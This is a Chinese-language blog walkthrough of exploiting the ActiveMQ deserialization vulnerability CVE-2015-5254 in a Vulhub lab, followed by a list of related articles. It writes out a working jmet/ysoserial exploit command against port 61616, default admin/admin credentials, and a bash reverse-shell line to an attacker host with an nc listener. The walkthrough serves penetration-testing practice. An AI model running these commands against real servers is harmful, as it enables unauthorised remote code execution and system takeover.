Vulhub靶机 ActiveMQ 反序列化漏洞(CVE-2015-5254)(渗透测试详解)

一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本:Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

二、访问靶机IP 8161端口

默认账户密码 admin/admin,登录

此时qucues事件为空

1、使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,反弹shell
命令(base64加密)}|{base64,-d}|{bash,-i}" -Yp ROME 目标IP 61616

反弹shell命令:echo "bash -i>& /dev/tcp/x.x.x.x/4444 0>&1"> /tmp/shell.sh && bash /tmp/shell.sh

出现此情况,是Java版本过高,根据以下链接更换Java版本

https://blog.csdn.net/weixin_46686336/article/details/140635571

切换完成后重新执行命令

出现以上情况就是执行成功

2、返回web页面,刷新

此时就多了一个事件,证明shell已经成功写入

3、攻击机开启nc监听

三、点击事件,成功反弹

至此,成功拿下系统权限。

下期再见,家人们!

相关推荐
Christal_pyy4 分钟前
树莓派4基于Debian GNU/Linux 12 (Bookworm)添加多个静态ipv4网络
linux·网络·debian
csbDD1 小时前
2025年网络安全(黑客技术)三个月自学手册
linux·网络·python·安全·web安全
荔枝荷包蛋6662 小时前
【Linux】HTTP:Cookie 和 Session 详解
网络·网络协议·http
EasyNVR2 小时前
EasyRTC智能硬件:实时畅联、沉浸互动、消音护航
运维·服务器·网络·安全·音视频·webrtc·p2p
劉煥平CHN2 小时前
RabbitMQ的脑裂(网络分区)问题
网络·分布式·rabbitmq
阿湯哥2 小时前
越权漏洞及其修复方法
网络·安全·web安全
Natsuagin3 小时前
轻松美化双系统启动界面与同步时间设置(Windows + Ubuntu)
linux·windows·ubuntu·grub
我们的五年3 小时前
【Linux网络编程】应用层协议HTTP(请求方法,状态码,重定向,cookie,session)
linux·网络·http
ZachOn1y4 小时前
计算机网络:应用层 —— 动态主机配置协议 DHCP
网络·计算机网络·应用层·dhcp·408考研
爱编程的小庄4 小时前
web网络安全:SQL 注入攻击
前端·sql·web安全